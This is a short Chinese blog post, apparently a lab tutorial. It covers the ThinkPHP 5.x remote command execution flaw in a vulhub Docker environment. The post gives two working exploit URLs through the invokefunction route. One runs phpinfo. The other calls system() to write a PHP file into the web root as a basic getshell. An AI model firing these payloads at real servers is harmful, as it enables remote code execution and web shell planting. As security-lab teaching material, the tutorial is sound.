当前位置: 首页 > news >正文

常⻅框架漏洞--ThinkPHP

news 来源:原创 2025/5/21 4:25:05

Thinkphp5x远程命令执⾏及getshell

环境搭建

cd vulhub/thinkphp/5-rce
docker-compose up -d #启动环境

访问网址

漏洞利⽤

?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
? s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1] []=echo "<?php phpinfo();?>" >>1.php

根⽬录⽣成1.php ⽂件,输出phpinfo
另一种方法,直接工具操作

相关文章:

  • Python虚拟环境:从入门到实战指南
  • vscode设置console.log的快捷输出方式
  • 量化研究--小果聚宽交易系统上线高速服务器,提供源代码
  • 『 C++ 』原生字符串:让字符串处理更轻松
  • 0基础学前端----移动WEB开发之flex布局DAY15
  • 单片机 - 串行通信 并行通信、接口类型及常见通信协议详细解析
  • 文件上传的小点总结(2)
  • 用DrissionPage升级网易云音乐爬虫:更稳定高效地获取歌单音乐(附原码)
  • 【leetcode hot 100 35】搜索插入位置
  • ZIP_STORED和ZIP_LZMA没有compresslevel参数!
  • html css js网页制作成品——HTML+CSS+js迪奥口红网站网页设计(4页)附源码
  • 智能汽车图像及视频处理方案,支持视频实时拍摄特效能力
  • Docker-Compose部署 EasySearch 异常问题排查
  • 探索AI的无限可能,体验智能对话的未来,大模型 API 演示
  • Qt 高效读写JSON文件,玩转QJsonDocument与QJsonObject
  • Unity跨平台构建快速回顾
  • [React 进阶系列] 组合组件 复合组件
  • Ubuntu系统使用nmcli配置静态IP
  • 机器学习之条件概率
  • 知识篇 | Oracle的 TEMP表空间管理和优化
  • 王毅会见阿富汗代理外长穆塔基
  • 中国代表:美国才是南海安全稳定的最大威胁
  • 欧盟和英国对俄新一轮制裁将中国公司也列入名单,外交部回应
  • 重庆黔江一足疗养生馆负责人涉嫌违法犯罪被移送检察机关
  • 王缉慈|迈向近零的产业集群需加强利益相关者合作行动
  • 减重人生|吃得越少越好?比体重秤上的数字,更有意义的是什么?